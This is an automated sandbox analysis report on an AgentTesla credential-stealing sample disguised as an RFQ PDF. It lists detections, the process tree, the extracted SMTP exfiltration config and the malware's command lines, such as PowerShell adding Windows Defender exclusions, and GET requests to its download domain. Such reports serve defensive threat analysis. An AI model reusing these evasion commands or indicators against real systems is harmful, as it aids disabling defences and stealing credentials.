
Analysis Report RFQ - REF 208056-pdf.exe

Overview

General Information

Sample Name: RFQ - REF 208056-pdf.exe
Analysis ID: 358398
MD5: c1b250f45de606ef95af9961496402a0
SHA1: a222da21dbd932d64f9cad12b46c068ac7360f72
SHA256: cdb8cf995f8287a1f64cd035c4e34e047e23a3218dbf50b0fcf321ecd464094e
Tags: exe, signed

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the Windows directory (C:\Windows) and starts them
Hides threads from debuggers
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to delay execution (extensive OutputDebugStringW loop)
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the Windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • RFQ - REF 208056-pdf.exe (PID: 6556 cmdline: 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' MD5: C1B250F45DE606EF95AF9961496402A0)
    • powershell.exe (PID: 5688 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 5504 cmdline: 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5716 cmdline: 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6736 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1044 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6220 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • RFQ - REF 208056-pdf.exe (PID: 5228 cmdline: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe MD5: C1B250F45DE606EF95AF9961496402A0)
    • WerFault.exe (PID: 6032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2200 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7040 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7108 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7156 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6064 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7008 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • explorer.exe (PID: 2084 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6816 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 1020 cmdline: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' MD5: C1B250F45DE606EF95AF9961496402A0)
  • explorer.exe (PID: 6400 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 2160 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 4820 cmdline: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' MD5: C1B250F45DE606EF95AF9961496402A0)
  • svchost.exe (PID: 5232 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6556 -ip 6556 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "FTP Info": "directortopcoba@top-co.babrSet=M{CAdetop-co.ba"}

Yara Overview

Memory Dumps

Source: 0000001B.00000002.497563880.0000000000402000.00000040.00000001.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000019.00000002.544137822.0000000003D04000.00000004.00000001.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

Unpacked PEs

Source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.raw.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 16.2.svchost.exe.47b10f0.5.raw.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 16.2.svchost.exe.47b10f0.5.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6816, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , ProcessId: 1020
Sigma detected: System File Execution Location Anomaly
Source: Process started, Author: Florian Roth, Patrick Bareiss, Data: Command: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6816, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , ProcessId: 1020
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov, Data: Command: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6816, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , ProcessId: 1020

Signature Overview

AV Detection:

Found malware configuration
Source: 16.2.svchost.exe.47b10f0.5.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "FTP Info": "directortopcoba@top-co.babrSet=M{CAdetop-co.ba"}
Multi AV Scanner detection for domain / URL
Source: coroloboxorozor.com, Virustotal: Detection: 15%
Source: http://coroloboxorozor.com, Virustotal: Detection: 15%
Source: http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.html, Virustotal: Detection: 15%
Multi AV Scanner detection for dropped file
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: RFQ - REF 208056-pdf.exe, Virustotal: Detection: 18%
Source: RFQ - REF 208056-pdf.exe, ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: RFQ - REF 208056-pdf.exe, Joe Sandbox ML: detected
Source: 16.0.svchost.exe.d60000.0.unpack, Avira: Label: TR/Dropper.Gen
Source: 16.2.svchost.exe.d60000.0.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.2.RFQ - REF 208056-pdf.exe.50000.0.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.0.RFQ - REF 208056-pdf.exe.50000.0.unpack, Avira: Label: TR/Dropper.Gen

Compliance:

Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: RFQ - REF 208056-pdf.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000B.00000000.311587089.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000000.329692687.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: C:\Users\user\Desktop\RFQ - REF 208056-pdf.PDB source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
Source: Binary string: OnpeiVisualBasic.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
Source: Binary string: O.pdb3X source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbA source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbn source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: hhRFQ - REF 208056-pdf.PDB source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
Source: Binary string: System.Management.Automation.pdb-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer3215EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC9F596836F97C8F7479F source: powershell.exe, 00000011.00000002.548053273.0000000008392000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb^ source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: global traffic, HTTP traffic detected: GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1 Host: coroloboxorozor.com
Source: global traffic, HTTP traffic detected: GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1 Host: coroloboxorozor.com
Source: Joe Sandbox View, IP Address: 172.67.172.17
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: unknown, DNS traffic detected: queries for: coroloboxorozor.com

System Summary:

Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Code function: 0_2_022E0BA0 NtSetInformationThread,
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Code function: 0_2_022E2750
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Code function: 0_2_0237C2F0
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Code function: 0_2_023793F0
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Code function: 0_2_08100040
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Code function: 0_2_0810000A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0357B348
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_035785C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0357CAB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0357F9C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0357A9B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0357ECA4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_03577210
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_03575797
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_035757A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_03577680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_03578DF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_03580390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_03582B08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_035889BB
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe | Code function: 16_2_059EB1F4
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe | Code function: 16_2_059EB1E8
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe | Code function: 16_2_059E93F0
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe | Code function: 16_2_059EDFB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0378C920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0378EA2F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0827EC58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_08278DA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_08278D99
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0827A427
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0827A438
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_08273D83
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_08273D90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_08307E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_089EE5A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_089ED730
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: String function: 0040B550 appears 50 times
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6556 -ip 6556
Source: RFQ - REF 208056-pdf.exe | Static PE information: invalid certificate
Source: AdvancedRun.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs RFQ - REF 208056-pdf.exe
Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp | Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs RFQ - REF 208056-pdf.exe
Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs RFQ - REF 208056-pdf.exe
Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543316412.0000000005C30000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs RFQ - REF 208056-pdf.exe
Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543447459.0000000005C80000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs RFQ - REF 208056-pdf.exe
Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543447459.0000000005C80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs RFQ - REF 208056-pdf.exe
Source: RFQ - REF 208056-pdf.exe, 00000000.00000000.228993123.000000000006E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTEwJVelt.exe2 vs RFQ - REF 208056-pdf.exe
Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameIoxb OTf.exe2 vs RFQ - REF 208056-pdf.exe
Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.401077790.00000000022F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs RFQ - REF 208056-pdf.exe
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: C:\Windows\explorer.exe | Section loaded: ninput.dll
Source: classification engine | Classification label: mal100.troj.evad.winEXE@37/15@3/3
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 11_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 13_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 11_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 11_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 11_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210225
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_01
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3
Source: unknown | Process created: C:\Windows\explorer.exe
Source: RFQ - REF 208056-pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: RFQ - REF 208056-pdf.exe | Virustotal: Detection: 18%
Source: RFQ - REF 208056-pdf.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File read: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe'
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
